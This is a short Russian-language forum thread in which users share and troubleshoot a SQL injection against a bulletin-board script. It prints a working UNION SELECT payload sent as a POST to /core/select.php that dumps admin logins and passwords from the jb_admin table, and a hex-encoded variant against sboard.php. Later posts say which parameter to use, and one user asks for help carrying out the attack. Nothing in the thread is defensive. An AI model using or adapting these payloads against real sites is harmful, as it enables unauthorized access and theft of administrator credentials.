SQL-INJ POST запрос к /core/select.php aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin -- Вывод будет в последнем элементе выпадающего списка Уязвимый кусок кода: целиком весь файл)[/QUOTE] Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет. Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin -- Я что-то неверно ввожу или автор этот баг уже исправил?
Блин, ну вот как вы это нашли, я понять просто не в силах... Особенно вот это:sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20
Читать умеешь? POST запрос PS: переменная id_category[/QUOTE] Так подскажите как и чем можно реализовать сори за тупость, просто надо
